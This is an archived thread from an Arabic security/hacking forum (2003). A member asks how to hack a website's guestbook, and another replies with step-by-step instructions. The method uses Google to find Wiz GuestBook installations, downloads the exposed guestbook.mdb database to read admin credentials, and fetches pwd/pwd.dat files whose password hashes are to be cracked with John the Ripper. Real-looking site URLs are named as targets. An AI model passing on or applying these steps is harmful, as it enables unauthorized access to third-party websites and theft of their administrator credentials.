كيف اخترق عن طريق الجست بوك [الأرشيف] - .:: منتديات العاصفة - اول منتدى عربي متخصص في التقنية والحماية ::.

THE MONSTER

03-10-2003, 08:49

ممكن شباب احد يعطيني الطريقة الي ممكن من خلالها استغل وجود الجست بوك واخترق الجست بك حق الموقع

خالد7

03-10-2003, 10:12

شرح ثغرة
guestbook.mdb
وأستغلالها
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب
Wiz GuestBook
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.huddle.org/guestbook
نضيف عليه هالوصلة:
guestbook.mdb
ليصبح
http://www.huddle.org/guestbook/guestbook.mdb
سوف ينزل إلى جهازك ملف قاعدة بيانات نفتحه ببرنامج مايكروسوفت أكسس
وسوف تجد اليوزر نيم والباسوورد في الجدول
tblConfiguration
أذهب الى لوحه التحكم الأدمن أضف هالوصلة:
admin.htm
ليصبح
http://www.huddle.org/guestbook/admin.html
ــــــــــــــــــــــــــــــــــــــــ

وهذي ثغره ثانيا ولكن ماشرحناها وهيه ماتبيله اي شرح
ودامك جبت طاريها نشرحها في نفس الموضوع

وهيه ايضا في ال /guestbook/
نفس طريقة اليحث المذكوره
اكتب بعد الموقع مباشر اي ثغره من
/guestbook/pwd
/guestbook/pwd.dat
guestbook.pwd
ليضهر لك بالشكل هذا http://www.huenibasket.ch/guestbook/pwd

راح تلاقي الباسوورد مشفر فك برنامج جون وسلامتك
/guestbook/pwd.dat
|4||4|

sitrx

03-10-2003, 01:56

خالد7

يعطيك العافيه يا اخوي يا خالد :)

مع تحياتي

اخوكم

سايتركس :(

خالد7

04-10-2003, 05:43

الله يعافيك :)

THE MONSTER

05-10-2003, 06:28

مشكور على التوضح

خالد7

05-10-2003, 08:32

العفوا THE MONSTER

moot_88

06-10-2003, 05:35

مشكور ياخالد 7

خالد7

07-10-2003, 12:29

العفواmoot_88:)